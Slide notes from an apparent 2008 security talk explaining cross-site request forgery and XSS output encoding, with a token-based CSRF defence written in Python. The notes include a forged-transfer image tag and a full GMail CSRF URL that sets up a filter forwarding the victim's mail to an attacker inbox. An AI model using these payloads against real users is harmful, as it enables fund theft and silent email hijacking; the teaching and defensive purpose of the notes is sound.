
4/26/2008

Cross-Site Request Forgery: “The Sleeping Giant of Website Vulnerabilities”

Cross-Site Scripting (XSS) - forcing malicious content to be
served by a trusted website to an unsuspecting user.

Cross-Site Request Forgery (CSRF) - forcing an unsuspecting
user’s browser to send requests they didn’t intend. (wire
transfer, blog post, etc.)

<IMG SRC=http://webbank/transfer_funds.cgi?from=314159265&to=1618&amount=5000&date=11072006>
What CSRF Can and Cannot Do
Can:
Force a user to make any HTTP request to anywhere.
Can’t:
Read the web page that is returned in the browser.

GMail E-mail Hijack Technique
• Victim visits a web page containing JavaScript malware. The
JavaScript malware forces the user to make a multipart/form-data
form submission to GMail (CSRF).
http://www.gnucitizen.org/util/csrf?_method=POST&_enctype=multipart/formdata&_action=https%3A//mail.google.com/mail/h/ewt1jmuj4ddv/%3Fv%3Dprf&cf2_emc=true&cf2_email=evilinbox@mailinator.com&cf1_from&cf1_to&cf1_subj&cf1_has&cf1_hasnot&cf1_attach=true&tfi&s=z&irf=on&nvp_bu_cftb=Create%20Filter
• If the user is logged-in, a filter is entered into the user’s account,
which they are unlikely to notice, that forwards all their email to
“evilinbox@mailinator.com”.
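The defence that follows from the two properties above (the browser sends the cookie automatically, but the forging page cannot read any response) is a per-session secret token that the server requires on every state-changing request. The handler below is an added example, not code from the original presentation; the server key, the session ids and the request dicts are constructed stand-ins for the bank's transfer_funds.cgi. It shows that rejecting GET alone stops the IMG forgery but not a forged multipart POST like the GMail filter case, while the token check stops both.

```python
import hashlib
import hmac
import secrets

# Constructed server-side key; a real deployment loads it from configuration.
SERVER_KEY = secrets.token_bytes(32)


def csrf_token(session_id: str) -> str:
    """Derive the anti-CSRF token for a session: HMAC-SHA256 of the session id.
    It is embedded in the bank's own form, which an attacker's page cannot read."""
    return hmac.new(SERVER_KEY, session_id.encode(), hashlib.sha256).hexdigest()


def transfer_funds(request: dict) -> tuple:
    """Simulated transfer_funds.cgi. `request` is a constructed dict with keys
    method, cookie (the session id the browser attaches on its own) and params
    (query string or form fields). Returns (status, message)."""
    session_id = request.get("cookie")
    if not session_id:
        return 401, "not logged in"
    if request["method"] != "POST":
        # The <IMG SRC=...> forgery arrives as a GET. A GET must never change
        # state, so it is refused before any parameter is looked at.
        return 405, "state-changing request must be POST"
    # A forged multipart POST (the GMail filter technique) still carries the
    # victim's cookie, so the method check alone is not enough. Demand the
    # session-bound token and compare in constant time.
    supplied = request["params"].get("csrf_token", "")
    expected = csrf_token(session_id)
    if not hmac.compare_digest(supplied.encode(), expected.encode()):
        return 403, "missing or invalid CSRF token"
    p = request["params"]
    return 200, "transferred %s from %s to %s" % (p["amount"], p["from"], p["to"])
```

The token must be checked on the server for every state-changing endpoint; a GET-only or POST-only rule, a Referer check, or a token the client can fetch cross-site gives no such guarantee.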

XSS Output Filtering (HTML Encoding)
• $data =~ s/(<|>|\"|\'|\(|\)|:)/'&#'.ord($1).';'/sge;
• $data =~ s/([^\w])/'&#'.ord($1).';'/sge;
